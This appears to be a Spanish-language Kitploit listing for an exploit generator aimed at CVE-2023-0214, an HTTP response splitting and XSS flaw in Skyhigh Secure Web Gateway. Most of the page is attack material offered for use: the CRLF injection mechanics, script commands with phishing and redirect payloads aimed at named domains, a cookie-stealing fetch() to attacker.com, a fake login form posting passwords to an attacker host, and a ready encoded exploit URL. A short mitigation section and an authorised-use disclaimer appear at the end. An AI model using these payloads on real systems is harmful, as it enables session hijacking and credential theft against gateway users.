Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2023-0214 — Secure Web Gateway 10.2.11 - Secuencias de comandos entre sitios (XSS) | Kitploit
Herramientas/GitHubGitHub/0pts/cve-2023-0214
Herramientas de PhishingAnálisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebPruebas de PenetraciónRed Teaming
GitHub0pts/cve-2023-0214

CVE-2023-0214

Secure Web Gateway 10.2.11 - Secuencias de comandos entre sitios (XSS)

Ver Repositorio
24hace 7 mesesAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

SWG Exploit Generator

root@kitploit:~
██████╗ ██████╗ ████████╗███████╗
██╔═████╗██╔══██╗╚══██╔══╝██╔════╝
██║██╔██║██████╔╝   ██║   ███████╗
████╔╝██║██╔═══╝    ██║   ╚════██║
╚██████╔╝██║        ██║   ███████║
 ╚═════╝ ╚═╝        ╚═╝   ╚══════╝

por 0PTS

Prueba de concepto para la vulnerabilidad HTTP Response Splitting en Skyhigh Secure Web Gateway (anteriormente McAfee Web Gateway).

Sobre la vulnerabilidad

Vulnerabilidad crítica de HTTP Response Splitting en Skyhigh Secure Web Gateway que permite ejecutar remotamente ataques XSS mediante la inyección de código HTML/JavaScript arbitrario.

Detalles técnicos

  • Tipo: HTTP Response Splitting / Cross-Site Scripting (XSS)
  • Peligro: Alto
  • Vector de ataque: Remoto, no requiere autenticación

Principio de funcionamiento del exploit

La vulnerabilidad se encuentra en el plugin «Ssos» (acción SetLoginToken), que procesa incorrectamente los parámetros de URL:

  1. Parámetro «p» → se inyecta en la cabecera P3P
  2. Parámetro «c» → se inyecta en el cuerpo de la respuesta
  3. Parámetro «v» → se inyecta en la cookie MwgSso

Dado que los caracteres de nueva línea (\r\n / %0d%0a) no se escapan, el atacante puede:

  • Inyectar cabeceras HTTP arbitrarias
  • Sobrescribir Content-Type y Content-Length
  • Inyectar código HTML/JavaScript arbitrario

El navegador ignora el resto del contenido de la respuesta después de un Content-Length correctamente formado, lo que permite sustituir por completo el contenido mostrado.

Uso

Ejecución básica

root@kitploit:~
python explot.py

Con parámetros (como nmap)

root@kitploit:~
# XSS básico
python explot.py -d example.com -p "<script>alert(document.domain)</script>"

# Redirección
python explot.py -d target.com -p '<meta http-equiv="refresh" content="0;url=https://evil.com/">'

# Formulario de phishing
python explot.py -d bank.com -p '<form action="https://evil.com/steal"><input name="pass" placeholder="Password"><button>Login</button></form>'

# Solo URL (modo silencioso)
python explot.py -d example.com -p "<script>alert(1)</script>" -q

Parámetros

root@kitploit:~
-d, --domain    Dominio objetivo (por defecto: google.com)
-x, --prefix    Prefijo de la ruta URL (por defecto: SWG internal path)
-p, --payload   Payload HTML/JavaScript
-q, --quiet     Modo silencioso - solo URL
-v, --version   Versión del script
-h, --help      Ayuda

Ejemplos de payload

XSS con robo de cookies

root@kitploit:~
<script>fetch('https://attacker.com/log?c='+document.cookie)</script>

Formulario de phishing

root@kitploit:~
<html>
<body style="font-family:Arial">
<h2>Session Expired - Please Login Again</h2>
<form action="https://attacker.com/phish" method="POST">
<input type="text" name="user" placeholder="Username"><br>
<input type="password" name="pass" placeholder="Password"><br>
<button>Login</button>
</form>
</body>
</html>

Redirección a un sitio malicioso

root@kitploit:~
<meta http-equiv="refresh" content="0;url=https://malicious-site.com/">

Demostración

root@kitploit:~
██████╗ ██████╗ ████████╗███████╗
██╔═████╗██╔══██╗╚══██╔══╝██╔════╝
██║██╔██║██████╔╝   ██║   ███████╗
████╔╝██║██╔═══╝    ██║   ╚════██║
╚██████╔╝██║        ██║   ███████║
 ╚═════╝ ╚═╝        ╚═╝   ╚══════╝

[+] Target Domain:   example.com
[+] Payload Length:  43 bytes
[+] URL Length:      234 chars

[+] Generated URL:

http://example.com/mwg-internal/de5fs23hu73ds/plugin?target=Ssos&action=SetLoginToken&v=1&c=1&p=p%0D%0AContent-Type%3A%20text%2Fhtml%3Bcharset%3Dutf-8%0D%0AContent-Length%3A%2043%0D%0A%0D%0A%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E

Protección

  1. Actualice Skyhigh SWG a la última versión
  2. Utilice un WAF con filtrado de inyecciones CRLF
  3. Supervise las solicitudes sospechosas a /mwg-internal/*

Descargo de responsabilidad

⚠️ ADVERTENCIA: Esta herramienta está destinada exclusivamente a:

  • Pruebas de penetración autorizadas
  • Fines educativos
  • Competiciones CTF
  • Investigación en seguridad

El uso contra sistemas sin el permiso explícito del propietario es ilegal.

Fuentes

  • https://www.exploit-db.com/exploits/51237
  • Skyhigh Security Bulletins

root@kitploit:~
██████╗ ██████╗ ████████╗███████╗
██╔═████╗██╔══██╗╚══██╔══╝██╔════╝
██║██╔██║██████╔╝   ██║   ███████╗
████╔╝██║██╔═══╝    ██║   ╚════██║
╚██████╔╝██║        ██║   ███████║
 ╚═════╝ ╚═╝        ╚═╝   ╚══════╝
Descargar herramienta